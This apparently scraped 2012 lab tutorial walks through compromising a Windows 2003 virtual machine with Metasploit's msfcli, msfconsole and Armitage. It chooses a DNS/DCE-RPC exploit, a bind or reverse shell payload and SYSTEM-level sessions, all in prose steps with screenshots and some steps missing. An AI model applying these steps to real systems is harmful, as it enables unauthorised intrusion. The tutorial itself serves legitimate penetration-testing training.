Professional Documents
Culture Documents
Step-by-step procedure
PART A: Using Metasploit msfcli
1. Turn on both VMs and check the victims IP address. In a real situation youre supposed to find this on the reconnaissance phase.
Pgina 1
2. Now go to the hacker machine, open a command prompt and change to the /pentest/exploits/framework3 directory. Were gonna use the metasploit CLI for this hack.
Pgina 2
3. Execute msfcli and search for DNS related exploits for the Windows platform.
4. Now were gonna use the O parameter in order to find the options for this exploit. After that well set the RHOST option to our target IP address and use the P parameter for finding a good payload that we can use.
Pgina 3
5. Well choose a simple payload generic/shell_bind_tcp in order to get a command prompt from our victim. Before doing that we asks the kind of targets supported for this exploit with the T option, so we make sure Windows 2003 is vulnerable to this attack.
Pgina 4
6. Finally we execute the exploit with the E option and voil! Were inside!! Enjoy ;)
Pgina 5
Pgina 6
2. The msfconsole has a useful help command that we can use to explore all the options available.
3. We can use the show exploits command in order to look for the one we want
Pgina 7
Pgina 8
2. After we have click the Start MSF button well see Armitages interface.
Pgina 9
3. As we have executed an attack before against our target, Armitage should see our victims in the host list so we select it with a simple click. Then we expand the exploit -> windows -> dcerpc menu on the left and select our last exploit. After that we just have to do a doubleclick.
4. Be sure to select the use reverse connection checkbox and click on the Launch button.
Pgina 10
Pgina 11
6. Now we just list the sessions available and connect to the proper one. Keep in mind that we have the privileges of the SYSTEM user as Armitage previously informed us. To list the sessions we use the command sessions l .
7. To interact with a session we use the sessions i # where # should be replaced with the proper session number.
Pgina 12
Copyright 2012 Elixircorp S.A. Legal Note: All the brands and applications used in this article belong to their respective owners.
Pgina 13